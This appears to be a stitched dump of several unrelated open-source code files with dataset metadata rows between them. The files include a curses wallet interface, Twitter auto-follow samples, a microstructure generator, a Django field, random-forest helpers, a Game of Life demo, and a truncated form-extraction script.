self.stdscr.addstr( 0, 2 + 2*i + len(''.join(self.tab_names[0:i])), ' '+self.tab_names[i]+' ', curses.A_BOLD if self.tab == i else 0)
self.stdscr.addstr( self.maxy -1, self.maxx-30, ' '.join([_("Settings"), _("Network"), _("Quit")]))
def print_contacts(self):
messages = map(lambda addr: "%30s %30s "%(addr, self.wallet.labels.get(addr,"")), self.wallet.addressbook)
self.print_list(messages, "%19s %25s "%("Address", "Label"))
def print_receive(self):
fmt = "%-35s %-30s"
messages = map(lambda addr: fmt % (addr, self.wallet.labels.get(addr,"")), self.wallet.addresses())
self.print_list(messages, fmt % ("Address", "Label"))
def print_edit_line(self, y, label, text, index, size):
text += " "*(size - len(text) )
self.stdscr.addstr( y, 2, label)
self.stdscr.addstr( y, 15, text, curses.A_REVERSE if self.pos%6==index else curses.color_pair(1))
def print_send_tab(self):
self.stdscr.clear()
self.print_edit_line(3, _("Pay to"), self.str_recipient, 0, 40)
self.print_edit_line(5, _("Description"), self.str_description, 1, 40)
self.print_edit_line(7, _("Amount"), self.str_amount, 2, 15)
self.print_edit_line(9, _("Fee"), self.str_fee, 3, 15)
self.stdscr.addstr( 12, 15, _("[Send]"), curses.A_REVERSE if self.pos%6==4 else curses.color_pair(2))
self.stdscr.addstr( 12, 25, _("[Clear]"), curses.A_REVERSE if self.pos%6==5 else curses.color_pair(2))
def print_banner(self):
if self.network:
self.print_list( self.network.banner.split('\n'))
def print_list(self, list, firstline = None):
self.maxpos = len(list)
if not self.maxpos: return
if firstline:
firstline += " "*(self.maxx -2 - len(firstline))
self.stdscr.addstr( 1, 1, firstline )
for i in range(self.maxy-4):
msg = list[i] if i < len(list) else ""
msg += " "*(self.maxx - 2 - len(msg))
m = msg[0:self.maxx - 2]
m = m.encode(self.encoding)
self.stdscr.addstr( i+2, 1, m, curses.A_REVERSE if i == (self.pos % self.maxpos) else 0)
def refresh(self):
if self.tab == -1: return
self.stdscr.border(0)
self.print_balance()
self.stdscr.refresh()
def main_command(self):
c = self.stdscr.getch()
print c
if c == curses.KEY_RIGHT: self.tab = (self.tab + 1)%self.num_tabs
elif c == curses.KEY_LEFT: self.tab = (self.tab - 1)%self.num_tabs
elif c == curses.KEY_DOWN: self.pos +=1
elif c == curses.KEY_UP: self.pos -= 1
elif c == 9: self.pos +=1 # tab
elif curses.unctrl(c) in ['^W', '^C', '^X', '^Q']: self.tab = -1
elif curses.unctrl(c) in ['^N']: self.network_dialog()
elif curses.unctrl(c) == '^S': self.settings_dialog()
else: return c
if self.pos<0: self.pos=0
if self.pos>=self.maxpos: self.pos=self.maxpos - 1
def run_tab(self, i, print_func, exec_func):
while self.tab == i:
self.stdscr.clear()
print_func()
self.refresh()
c = self.main_command()
if c: exec_func(c)
def run_history_tab(self, c):
if c == 10:
out = self.run_popup('',["blah","foo"])
def edit_str(self, target, c, is_num=False):
# detect backspace
if c in [8, 127, 263] and target:
target = target[:-1]
elif not is_num or curses.unctrl(c) in '0123456789.':
target += curses.unctrl(c)
return target
def run_send_tab(self, c):
if self.pos%6 == 0:
self.str_recipient = self.edit_str(self.str_recipient, c)
if self.pos%6 == 1:
self.str_description = self.edit_str(self.str_description, c)
if self.pos%6 == 2:
self.str_amount = self.edit_str(self.str_amount, c, True)
elif self.pos%6 == 3:
self.str_fee = self.edit_str(self.str_fee, c, True)
elif self.pos%6==4:
if c == 10: self.do_send()
elif self.pos%6==5:
if c == 10: self.do_clear()
def run_receive_tab(self, c):
if c == 10:
out = self.run_popup('Address', ["Edit label", "Freeze", "Prioritize"])
def run_contacts_tab(self, c):
if c == 10 and self.wallet.addressbook:
out = self.run_popup('Adress', ["Copy", "Pay to", "Edit label", "Delete"]).get('button')
address = self.wallet.addressbook[self.pos%len(self.wallet.addressbook)]
if out == "Pay to":
self.tab = 1
self.str_recipient = address
self.pos = 2
elif out == "Edit label":
s = self.get_string(6 + self.pos, 18)
if s:
self.wallet.labels[address] = s
def run_banner_tab(self, c):
self.show_message(repr(c))
pass
def main(self,url):
tty.setraw(sys.stdin)
while self.tab != -1:
self.run_tab(0, self.print_history, self.run_history_tab)
self.run_tab(1, self.print_send_tab, self.run_send_tab)
self.run_tab(2, self.print_receive, self.run_receive_tab)
self.run_tab(3, self.print_contacts, self.run_contacts_tab)
self.run_tab(4, self.print_banner, self.run_banner_tab)
tty.setcbreak(sys.stdin)
curses.nocbreak()
self.stdscr.keypad(0)
curses.echo()
curses.endwin()
def do_clear(self):
self.str_amount = ''
self.str_recipient = ''
self.str_fee = ''
self.str_description = ''
def do_send(self):
if not is_valid(self.str_recipient):
self.show_message(_('Invalid devcoin address'))
return
try:
amount = int( Decimal( self.str_amount) * 100000000 )
except Exception:
self.show_message(_('Invalid Amount'))
return
try:
fee = int( Decimal( self.str_fee) * 100000000 )
except Exception:
self.show_message(_('Invalid Fee'))
return
if self.wallet.use_encryption:
password = self.password_dialog()
if not password:
return
else:
password = None
try:
tx = self.wallet.mktx( [(self.str_recipient, amount)], password, fee)
except Exception as e:
self.show_message(str(e))
return
if self.str_description:
self.wallet.labels[tx.hash()] = self.str_description
h = self.wallet.send_tx(tx)
self.show_message(_("Please wait..."), getchar=False)
self.wallet.tx_event.wait()
status, msg = self.wallet.receive_tx( h, tx )
if status:
self.show_message(_('Payment sent.'))
self.do_clear()
#self.update_contacts_tab()
else:
self.show_message(_('Error'))
def show_message(self, message, getchar = True):
w = self.w
w.clear()
w.border(0)
for i, line in enumerate(message.split('\n')):
w.addstr(2+i,2,line)
w.refresh()
if getchar: c = self.stdscr.getch()
def run_popup(self, title, items):
return self.run_dialog(title, map(lambda x: {'type':'button','label':x}, items), interval=1, y_pos = self.pos+3)
def network_dialog(self):
if not self.network: return
auto_connect = self.network.config.get('auto_cycle')
host, port, protocol = self.network.default_server.split(':')
srv = 'auto-connect' if auto_connect else self.network.default_server
out = self.run_dialog('Network', [
{'label':'server', 'type':'str', 'value':srv},
{'label':'proxy', 'type':'str', 'value':self.config.get('proxy', '')},
], buttons = 1)
if out:
if out.get('server'):
server = out.get('server')
auto_connect = server == 'auto-connect'
if not auto_connect:
try:
host, port, protocol = server.split(':')
except Exception:
self.show_message("Error:" + server + "\nIn doubt, type \"auto-connect\"")
return False
if out.get('proxy'):
proxy = self.parse_proxy_options(out.get('proxy'))
else:
proxy = None
self.network.set_parameters(host, port, protocol, proxy, auto_connect)
def settings_dialog(self):
out = self.run_dialog('Settings', [
{'label':'Default GUI', 'type':'list', 'choices':['classic','lite','gtk','text'], 'value':self.config.get('gui')},
{'label':'Default fee', 'type':'satoshis', 'value': format_satoshis(self.wallet.fee).strip() }
], buttons = 1)
if out:
if out.get('Default GUI'):
self.config.set_key('gui', out['Default GUI'], True)
if out.get('Default fee'):
fee = int ( Decimal( out['Default fee']) *10000000 )
self.config.set_key('fee_per_kb', fee, True)
def password_dialog(self):
out = self.run_dialog('Password', [
{'label':'Password', 'type':'password', 'value':''}
], buttons = 1)
return out.get('Password')
def run_dialog(self, title, items, interval=2, buttons=None, y_pos=3):
self.popup_pos = 0
self.w = curses.newwin( 5 + len(items)*interval + (2 if buttons else 0), 50, y_pos, 5)
w = self.w
out = {}
while True:
w.clear()
w.border(0)
w.addstr( 0, 2, title)
num = len(items)
numpos = num
if buttons: numpos += 2
for i in range(num):
item = items[i]
label = item.get('label')
if item.get('type') == 'list':
value = item.get('value','')
elif item.get('type') == 'satoshis':
value = item.get('value','')
elif item.get('type') == 'str':
value = item.get('value','')
elif item.get('type') == 'password':
value = '*'*len(item.get('value',''))
else:
value = ''
if len(value)<20: value += ' '*(20-len(value))
if item.has_key('value'):
w.addstr( 2+interval*i, 2, label)
w.addstr( 2+interval*i, 15, value, curses.A_REVERSE if self.popup_pos%numpos==i else curses.color_pair(1) )
else:
w.addstr( 2+interval*i, 2, label, curses.A_REVERSE if self.popup_pos%numpos==i else 0)
if buttons:
w.addstr( 5+interval*i, 10, "[ ok ]", curses.A_REVERSE if self.popup_pos%numpos==(numpos-2) else curses.color_pair(2))
w.addstr( 5+interval*i, 25, "[cancel]", curses.A_REVERSE if self.popup_pos%numpos==(numpos-1) else curses.color_pair(2))
w.refresh()
c = self.stdscr.getch()
if c in [ord('q'), 27]: break
elif c in [curses.KEY_LEFT, curses.KEY_UP]: self.popup_pos -= 1
elif c in [curses.KEY_RIGHT, curses.KEY_DOWN]: self.popup_pos +=1
else:
i = self.popup_pos%numpos
if buttons and c==10:
if i == numpos-2:
return out
elif i == numpos -1:
return {}
item = items[i]
_type = item.get('type')
if _type == 'str':
item['value'] = self.edit_str(item['value'], c)
out[item.get('label')] = item.get('value')
elif _type == 'password':
item['value'] = self.edit_str(item['value'], c)
out[item.get('label')] = item ['value']
elif _type == 'satoshis':
item['value'] = self.edit_str(item['value'], c, True)
out[item.get('label')] = item.get('value')
elif _type == 'list':
choices = item.get('choices')
try:
j = choices.index(item.get('value'))
except Exception:
j = 0
new_choice = choices[(j + 1)% len(choices)]
item['value'] = new_choice
out[item.get('label')] = item.get('value')
elif _type == 'button':
out['button'] = item.get('label')
break
return out
| gpl-3.0 | -9,012,374,220,583,325,000 | 35.174274 | 151 | 0.50889 | false |
ac769/continuum_technologies | twitter/sample_twitter_codes.py | 1 | 1644 | ''''
In this code we'll have a bunch of examples you can use at your own discretion.
Simply remove the three ' marks above and below the code you want in order to run it, while
leaving the text within a new set of three ' marks.
Once that's done, go to your Terminal, navigate to where this code and the twitter_follow_bot
code is (they have to be in the same folder), and just type in "python sample_twitter_codes.py" (without quotes)
WARNING: Following too many people, favoriting too many things, CAN and WILL get you banned.
Be smart. And have fun :).
Justin and Nat
'''
'''
#1 Here you can automatically follow people who tweet about a certain phrase. Just replace the phrase
with something relevant to you! Also you can set the count to whatever makes you most comfortable.
'''
#from twitter_follow_bot import auto_follow
#auto_follow("sharing economy 2.0", count=100)
'''
#2 In this code, change "jwmares" to the twitter handle whose followers you want to follow,
and set the count to how many people should be followed. Default is 100.
'''
#from twitter_follow_bot import auto_follow_followers_for_user
#auto_follow_followers_for_user("@InnoCentive", count=100)
'''
#3 This code will let you favourite things that are relevant to you. Just replace "phrase" with the phrase
you want to favorite for, and set the count to how many things you want to favorite.
'''
#from twitter_follow_bot import auto_fav
#auto_fav("#openinnovation", count=100)
'''
#4 This code will automatically un-follow everyone who hasn't followed you back.
from twitter_follow_bot import auto_unfollow_nonfollowers
auto_unfollow_nonfollowers()
''' | mit | -987,325,024,660,975,600 | 33.270833 | 112 | 0.756083 | false |
Micket/CCBuilder | make_cc.py | 1 | 8680 | #!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
import argparse
import pickle
import time
import CCBuilder as ccb
import CCBuilder_c as ccb_c
import numpy as np
import scipy.special
def uniform_dist(x):
""" Returns uniform distributions of given range """
return lambda: np.random.uniform(x[0], x[1])
def weibull_dist(a, mu):
""" Returns Weibull distributions for given shape parameter and average """
return lambda: np.random.weibull(a) * mu / scipy.special.gamma(1/a + 1)
def parse_dist(arg):
# Parses input string for given distribution.
# Returns a distribution, and the average
d, params = arg.split(':')
params = [float(x) for x in params.split(',')]
if d == 'U':
return uniform_dist(params), np.mean(params)
elif d == 'W':
a, mu = params
return weibull_dist(a, mu), mu
parser = argparse.ArgumentParser(description='''Generate a WC microstructure.
Grain shape/size supports 2 types of distributions:
Uniform: U:low,high
Weibull: U:a,mu (a=k in some notation, mu=mean)
''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument('-V', dest='verbose', action='store_true', help='Verbose mode.')
parser.add_argument('-f', dest='fname', metavar='basename', required=True, help='Output base filename.')
parser.add_argument('-L', dest='L', metavar='length', required=True, type=float, help='Cell length (volume is L^3)')
parser.add_argument('-m', dest='m', metavar='m', required=True, type=int,
help='Grid resolution. Total number of voxels are (m*L)^3')
parser.add_argument('--vol_frac_goal', dest="vol_frac_goal", metavar='v', required=True, type=float,
help='Goal for volume fraction WC (excluding overlap)')
parser.add_argument('-s', dest='seed', metavar='s', default=None, type=int,
help='Seed for RNG. Given identical parameters, ' +
'CCBuilder will generate identical output given a controlled seed.')
parser.add_argument('--stray_cleanup', action='store_true', help='Clean up stray voxels')
group = parser.add_argument_group('WC grain shape')
group.add_argument('-k', dest='k_dist', metavar='type,[params]', default='U:0.4,1.4',
help='k distribution')
group.add_argument('-r', dest='r_dist', metavar='type,[params]', default='U:0.1,0.4',
help='r distribution')
group.add_argument('-d', dest='d_dist', metavar='type,[params]', default='U:0.5,1.5',
help='d distribution')
group = parser.add_argument_group('Packing')
group.add_argument('--use_potential', action='store_true', help='Use repulsive potential.')
group.add_argument('--nr_tries', dest='nr_tries', metavar='n', default=2500, type=int,
help='Number of random translations.')
group.add_argument('--delta', dest='delta', metavar='d', type=float,
help='Maximum distance for randomized translations.')
group.add_argument('--m_coarse', dest="m_coarse", metavar='mc', default=10,
help='Grid resolution during packing.')
group = parser.add_argument_group('Potts simulation')
group.add_argument('--mc_steps', dest="mc_steps", metavar='steps', default=0.05, type=float,
help='Monte-Carlo steps (scales with (m*L)^4. Set to zero to turn off.')
group.add_argument('--tau', dest='tau', metavar='t', default=0.5, type=float,
help='Ficticious temperature in Potts model.')
options = parser.parse_args()
if options.seed is not None:
np.random.seed(options.seed)
# Heuristic mapping from actual to goal volume fraction
# vol_frac_goal = (alpha - 2)/(2 * alpha) + 1/alpha * np.sqrt(1 - alpha * np.log(-2*(vol_frac - 1)))
d_eq, d_0 = parse_dist(options.d_dist)
r, r_0 = parse_dist(options.r_dist)
k, k_0 = parse_dist(options.k_dist)
fname = options.fname
# to avoid confusion with types:
m = np.int(options.m)
m_coarse = np.int(options.m_coarse)
L = np.float(options.L)
mc_steps = np.float(options.mc_steps)
vol_frac_goal = np.double(options.vol_frac_goal)
tau = np.double(options.tau)
nr_tries = np.int(options.nr_tries)
delta_x = d_0/float(m)
M = np.int(m * L / d_0)
M_coarse = np.int(m_coarse * L / d_0)
idelta = M
idelta_coarse = M_coarse
if options.delta:
idelta = np.int(M * options.delta / L)
idelta_coarse = np.int(M_coarse * options.delta / L)
trunc_triangles = ccb.prepare_triangles(vol_frac_goal, L, r, k, d_eq)
# trunc_triangles = trunc_triangles[:1]
# trunc_triangles[0].rot_matrix = np.eye(3)
# trunc_triangles[0].rot_matrix_tr = np.eye(3)
# trunc_triangles[0].midpoint = np.array([2., 2., 2.])
# Sort triangles w.r.t. volume, so that large triangles are added to the box first (better packing)
trunc_triangles.sort(key=lambda x: x.volume, reverse=True)
print('Prepared', len(trunc_triangles), 'triangles')
if options.use_potential:
ccb.optimize_midpoints(L, trunc_triangles)
if m_coarse == m:
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, nr_tries, idelta, 1.0)
else:
if nr_tries > 0:
# Optimization: Use coarser grid for packing, then insert packed grains into fine grid
# No need to get the return values, trunc_triangles
ccb_c.populate_voxels(M_coarse, L, trunc_triangles, nr_tries, idelta_coarse, 1.0)
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, 1, 0, 1.0)
if mc_steps > 0:
start_time = time.time()
# Do Potts on coarse grid first for an improved initial guess.
M_coarseMC = M//2
grain_ids_coarse, overlaps_coarse, voxel_indices_coarse = ccb_c.populate_voxels(M_coarseMC, L, trunc_triangles, 0, 0, 1.0)
_, gb_voxels_coarse, _ = ccb_c.calc_surface_prop(M_coarseMC, grain_ids_coarse)
ccb_c.make_mcp_bound(M_coarseMC, grain_ids_coarse, gb_voxels_coarse, overlaps_coarse, voxel_indices_coarse,
np.int(mc_steps * M_coarseMC**4), tau)
# Copy over that solution to the overlap regions of the fine grid as a starting point
M2 = M**2
i = np.nonzero(overlaps)[0]
iz = i // M2
iy = (i - iz*M2) // M
ix = i - iz*M2 - iy*M
cix = ix * M_coarseMC // M
ciy = iy * M_coarseMC // M
ciz = iz * M_coarseMC // M
ci = cix + ciy*M_coarseMC + ciz*M_coarseMC**2
gid = grain_ids_coarse[ci]
# Could use a Cython implementation for efficiency.
for ii, g in zip(i, gid):
if g != grain_ids[ii] and np.searchsorted(voxel_indices[g-2], ii) < len(voxel_indices[g-2]):
grain_ids[ii] = g
# This might change a few voxels to a value that they shouldn't obtain, but it's barely noticeable
# grain_ids_1[i] = grain_ids_coarse[ci]
_, gb_voxels, _ = ccb_c.calc_surface_prop(M, grain_ids)
# and run the full resolution MCP:
ccb_c.make_mcp_bound(M, grain_ids, gb_voxels, overlaps, voxel_indices, np.int(mc_steps * M ** 4), tau)
print('Potts model took {} seconds'.format(np.str(time.time() - start_time)))
if options.stray_cleanup:
start_time = time.time()
ccb_c.stray_cleanup(M, grain_ids)
print('Stray voxel cleanup took {} seconds'.format(np.str(time.time() - start_time)))
surface_voxels, gb_voxels, interface_voxels = ccb_c.calc_surface_prop(M, grain_ids)
phases, good_voxels, euler_angles = ccb_c.calc_grain_prop(M, grain_ids, trunc_triangles)
phase_volumes = np.bincount(phases)
vol_frac_WC = phase_volumes[2] / np.float(M ** 3)
vol_frac_Co = 1 - vol_frac_WC
mass_frac_WC = ccb.mass_fraction(vol_frac_WC)
sum_gb_voxels = np.sum(gb_voxels)
contiguity = sum_gb_voxels / np.float(sum_gb_voxels + np.sum(interface_voxels))
print('Contiguity {:5f}, Co volume frac {:.5f}, mass frac {:.5f}'.format(
contiguity, 1 - vol_frac_WC, ccb.mass_fraction(vol_frac_WC)))
ccb.write_dream3d(fname, 3 * [M], 3 * [delta_x], trunc_triangles, grain_ids, phases, good_voxels,
euler_angles, surface_voxels, gb_voxels, interface_voxels, overlaps)
with open(fname + '_trunc_triangles.data', 'wb') as f:
pickle.dump([t.rot_matrix for t in trunc_triangles], f)
# Saving grain volume data
if False:
grain_volumes = np.bincount(grain_ids)
d_eq = ccb.volume_to_eq_d(grain_volumes[2:] * delta_x ** 3)
# np.savetxt(fname + '_d_orig.txt', [t.d_eq for t in trunc_triangles])
np.savetxt(fname + '_d.txt', d_eq)
# Plot initial and final distributions
import matplotlib.pyplot as plt
plt.hist(np.array([t.d_eq for t in trunc_triangles]), alpha=0.5, bins=15, normed=True, label='Initial')
plt.hist(d_eq, alpha=0.5, bins=15, normed=True, label='Final')
plt.legend(loc='upper right')
plt.show()
| gpl-3.0 | -3,357,573,291,557,032,400 | 41.54902 | 126 | 0.65818 | false |
lyoniionly/django-cobra | src/cobra/models/fields/node.py | 1 | 3306 | from __future__ import absolute_import, print_function
import collections
import logging
import six
import warnings
from django.db import models
from django.db.models.signals import post_delete
from cobra.core.cache import memoize
from cobra.core.compat import pickle
from cobra.core.strings import decompress, compress
from .gzippeddict import GzippedDictField
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], ["^cobra\.models\.fields\.node\.NodeField"])
__all__ = ('NodeField',)
logger = logging.getLogger('cobra.errors')
class NodeData(collections.MutableMapping):
def __init__(self, id, data=None):
self.id = id
self._node_data = data
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
def __delitem__(self, key):
del self.data[key]
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
def __repr__(self):
cls_name = type(self).__name__
if self._node_data:
return '<%s: id=%s data=%r>' % (
cls_name, self.id, repr(self._node_data))
return '<%s: id=%s>' % (cls_name, self.id,)
@memoize
def data(self):
from cobra import singleton
if self._node_data is not None:
return self._node_data
elif self.id:
warnings.warn('You should populate node data before accessing it.')
return singleton.nodestore.get(self.id) or {}
return {}
def bind_data(self, data):
self._node_data = data
class NodeField(GzippedDictField):
"""
Similar to the gzippedictfield except that it stores a reference
to an external node.
"""
def contribute_to_class(self, cls, name):
super(NodeField, self).contribute_to_class(cls, name)
post_delete.connect(
self.on_delete,
sender=self.model,
weak=False)
def on_delete(self, instance, **kwargs):
from cobra import singleton
value = getattr(instance, self.name)
if not value.id:
return
singleton.nodestore.delete(value.id)
def to_python(self, value):
if isinstance(value, six.string_types) and value:
try:
value = pickle.loads(decompress(value))
except Exception as e:
logger.exception(e)
value = {}
elif not value:
value = {}
if 'node_id' in value:
node_id = value.pop('node_id')
data = None
else:
node_id = None
data = value
return NodeData(node_id, data)
def get_prep_value(self, value):
from cobra import singleton
if not value and self.null:
# save ourselves some storage
return None
# TODO(dcramer): we should probably do this more intelligently
# and manually
if not value.id:
value.id = singleton.nodestore.create(value.data)
else:
singleton.nodestore.set(value.id, value.data)
return compress(pickle.dumps({
'node_id': value.id
})) | apache-2.0 | 8,760,018,005,294,236,000 | 24.635659 | 79 | 0.588627 | false |
andersgs/dingo | dingo/random_forest.py | 1 | 2551 | '''
Some functions to fit a random forest
'''
import sklearn.ensemble
import pandas
import progressbar
bar = progressbar.ProgressBar()
def test_max_features(max_features):
if (max_features not in ['sqrt', 'auto', 'log2', None]):
try:
max_features = int(max_features)
except ValueError:
print("max_features has to be an integer or one of 'sqrt', 'auto', 'log2' or None.")
raise
return max_features
def learn(X,y, n_trees = 10, criterion = 'entropy', max_features = "sqrt", max_depth = None, min_samples_split = 2, min_samples_leaf = 1, min_weight_fraction_leaf = 0, max_leaf_nodes = None, min_impurity_split = 1e-7, bootstrap = False, oob_score = False, n_jobs = 10, random_state = None, warm_start = False, class_weight = 'balanced_subsample'):
rf = sklearn.ensemble.RandomForestClassifier(n_estimators = n_trees, \
criterion = criterion, \
max_features = max_features, \
max_depth = max_depth, \
min_samples_split = min_samples_split, \
min_samples_leaf = min_samples_leaf, \
min_weight_fraction_leaf = min_weight_fraction_leaf, \
max_leaf_nodes = max_leaf_nodes, \
min_impurity_split = min_impurity_split, \
bootstrap = bootstrap, \
oob_score = oob_score, \
n_jobs = n_jobs, \
random_state = random_state, \
warm_start = warm_start, \
class_weight = class_weight, \
verbose = 1
)
rf.fit(X, y)
return rf
def importance(rf, kmers):
importance = rf.estimators_[0].feature_importances_
for est in bar(rf.estimators_[1:]):
importance += est.feature_importances_
importance = importance/rf.n_estimators
d = {"kmer": kmers,
"importance": importance}
d = pandas.DataFrame(d)
d = d.sort_values(by = "importance", ascending = 0)
d = d.loc[d.importance > 0]
return d
| bsd-3-clause | -2,556,278,225,202,661,400 | 49.019608 | 347 | 0.46374 | false |
Orav/kbengine | kbe/src/lib/python/Tools/demo/life.py | 1 | 9249 | #!/usr/bin/env python3
"""
A curses-based version of Conway's Game of Life.
An empty board will be displayed, and the following commands are available:
E : Erase the board
R : Fill the board randomly
S : Step for a single generation
C : Update continuously until a key is struck
Q : Quit
Cursor keys : Move the cursor around the board
Space or Enter : Toggle the contents of the cursor's position
Contributed by Andrew Kuchling, Mouse support and color by Dafydd Crosby.
"""
import curses
import random
class LifeBoard:
"""Encapsulates a Life board
Attributes:
X,Y : horizontal and vertical size of the board
state : dictionary mapping (x,y) to 0 or 1
Methods:
display(update_board) -- If update_board is true, compute the
next generation. Then display the state
of the board and refresh the screen.
erase() -- clear the entire board
make_random() -- fill the board randomly
set(y,x) -- set the given cell to Live; doesn't refresh the screen
toggle(y,x) -- change the given cell from live to dead, or vice
versa, and refresh the screen display
"""
def __init__(self, scr, char=ord('*')):
"""Create a new LifeBoard instance.
scr -- curses screen object to use for display
char -- character used to render live cells (default: '*')
"""
self.state = {}
self.scr = scr
Y, X = self.scr.getmaxyx()
self.X, self.Y = X - 2, Y - 2 - 1
self.char = char
self.scr.clear()
# Draw a border around the board
border_line = '+' + (self.X * '-') + '+'
self.scr.addstr(0, 0, border_line)
self.scr.addstr(self.Y + 1, 0, border_line)
for y in range(0, self.Y):
self.scr.addstr(1 + y, 0, '|')
self.scr.addstr(1 + y, self.X + 1, '|')
self.scr.refresh()
def set(self, y, x):
"""Set a cell to the live state"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
self.state[x, y] = 1
def toggle(self, y, x):
"""Toggle a cell's state between live and dead"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
if (x, y) in self.state:
del self.state[x, y]
self.scr.addch(y + 1, x + 1, ' ')
else:
self.state[x, y] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(random.randrange(1, 7)))
self.scr.addch(y + 1, x + 1, self.char)
self.scr.attrset(0)
self.scr.refresh()
def erase(self):
"""Clear the entire board and update the board display"""
self.state = {}
self.display(update_board=False)
def display(self, update_board=True):
"""Display the whole board, optionally computing one generation"""
M, N = self.X, self.Y
if not update_board:
for i in range(0, M):
for j in range(0, N):
if (i, j) in self.state:
self.scr.addch(j + 1, i + 1, self.char)
else:
self.scr.addch(j + 1, i + 1, ' ')
self.scr.refresh()
return
d = {}
self.boring = 1
for i in range(0, M):
L = range(max(0, i - 1), min(M, i + 2))
for j in range(0, N):
s = 0
live = (i, j) in self.state
for k in range(max(0, j - 1), min(N, j + 2)):
for l in L:
if (l, k) in self.state:
s += 1
s -= live
if s == 3:
# Birth
d[i, j] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(
random.randrange(1, 7)))
self.scr.addch(j + 1, i + 1, self.char)
self.scr.attrset(0)
if not live:
self.boring = 0
elif s == 2 and live:
# Survival
d[i, j] = 1
elif live:
# Death
self.scr.addch(j + 1, i + 1, ' ')
self.boring = 0
self.state = d
self.scr.refresh()
def make_random(self):
"Fill the board with a random pattern"
self.state = {}
for i in range(0, self.X):
for j in range(0, self.Y):
if random.random() > 0.5:
self.set(j, i)
def erase_menu(stdscr, menu_y):
"Clear the space where the menu resides"
stdscr.move(menu_y, 0)
stdscr.clrtoeol()
stdscr.move(menu_y + 1, 0)
stdscr.clrtoeol()
def display_menu(stdscr, menu_y):
"Display the menu of possible keystroke commands"
erase_menu(stdscr, menu_y)
# If color, then light the menu up :-)
if curses.has_colors():
stdscr.attrset(curses.color_pair(1))
stdscr.addstr(menu_y, 4,
'Use the cursor keys to move, and space or Enter to toggle a cell.')
stdscr.addstr(menu_y + 1, 4,
'E)rase the board, R)andom fill, S)tep once or C)ontinuously, Q)uit')
stdscr.attrset(0)
def keyloop(stdscr):
# Clear the screen and display the menu of keys
stdscr.clear()
stdscr_y, stdscr_x = stdscr.getmaxyx()
menu_y = (stdscr_y - 3) - 1
display_menu(stdscr, menu_y)
# If color, then initialize the color pairs
if curses.has_colors():
curses.init_pair(1, curses.COLOR_BLUE, 0)
curses.init_pair(2, curses.COLOR_CYAN, 0)
curses.init_pair(3, curses.COLOR_GREEN, 0)
curses.init_pair(4, curses.COLOR_MAGENTA, 0)
curses.init_pair(5, curses.COLOR_RED, 0)
curses.init_pair(6, curses.COLOR_YELLOW, 0)
curses.init_pair(7, curses.COLOR_WHITE, 0)
# Set up the mask to listen for mouse events
curses.mousemask(curses.BUTTON1_CLICKED)
# Allocate a subwindow for the Life board and create the board object
subwin = stdscr.subwin(stdscr_y - 3, stdscr_x, 0, 0)
board = LifeBoard(subwin, char=ord('*'))
board.display(update_board=False)
# xpos, ypos are the cursor's position
xpos, ypos = board.X // 2, board.Y // 2
# Main loop:
while True:
stdscr.move(1 + ypos, 1 + xpos) # Move the cursor
c = stdscr.getch() # Get a keystroke
if 0 < c < 256:
c = chr(c)
if c in ' \n':
board.toggle(ypos, xpos)
elif c in 'Cc':
erase_menu(stdscr, menu_y)
stdscr.addstr(menu_y, 6, ' Hit any key to stop continuously '
'updating the screen.')
stdscr.refresh()
# Activate nodelay mode; getch() will return -1
# if no keystroke is available, instead of waiting.
stdscr.nodelay(1)
while True:
c = stdscr.getch()
if c != -1:
break
stdscr.addstr(0, 0, '/')
stdscr.refresh()
board.display()
stdscr.addstr(0, 0, '+')
stdscr.refresh()
stdscr.nodelay(0) # Disable nodelay mode
display_menu(stdscr, menu_y)
elif c in 'Ee':
board.erase()
elif c in 'Qq':
break
elif c in 'Rr':
board.make_random()
board.display(update_board=False)
elif c in 'Ss':
board.display()
else:
# Ignore incorrect keys
pass
elif c == curses.KEY_UP and ypos > 0:
ypos -= 1
elif c == curses.KEY_DOWN and ypos + 1 < board.Y:
ypos += 1
elif c == curses.KEY_LEFT and xpos > 0:
xpos -= 1
elif c == curses.KEY_RIGHT and xpos + 1 < board.X:
xpos += 1
elif c == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
if (mouse_x > 0 and mouse_x < board.X + 1 and
mouse_y > 0 and mouse_y < board.Y + 1):
xpos = mouse_x - 1
ypos = mouse_y - 1
board.toggle(ypos, xpos)
else:
# They've clicked outside the board
curses.flash()
else:
# Ignore incorrect keys
pass
def main(stdscr):
keyloop(stdscr) # Enter the main loop
if __name__ == '__main__':
curses.wrapper(main)
| lgpl-3.0 | -7,308,566,763,295,885,000 | 33.301527 | 81 | 0.484917 | false |
jwilliamn/handwritten | extraction/FormatModel/CreatePage3Variable.py | 1 | 6106 | import pickle
from extraction.FormatModel.VariableDefinitions import *
from extraction.FormatModel.RawVariableDefinitions import *
import json
def jsonDefault(object):
return object.__dict__
if __name__ == '__main__':
Page3 = Category('page3', 'pagina 3')
############
for r in range(1,6):
str_r = str(r)
if len(str_r) == 1:
str_r = '0'+str_r
P = Category('P'+str_r,'Persona '+str_r)
ap_paterno=Category('apellido_paterno','Apellido paterno')
variable_ap_paterno=Variable('pos_TL_BR','posicion final', None)
ap_paterno.addSubType(variable_ap_paterno)
ap_materno = Category('apellido_materno', 'Apellido materno')
variable_ap_materno = Variable('pos_TL_BR', 'posicion final', None)
ap_materno.addSubType(variable_ap_materno)
nombres = Category('nombres', 'nombres')
variable_nombres = Variable('pos_TL_BR', 'posicion final', None)
nombres.addSubType(variable_nombres)
fecha_nacimiento = Category('fecha_nacimiento', 'Fecha de nacimiento')
variable_fecha_nacimiento = Variable('pos_TL_BR', 'posicion final', None)
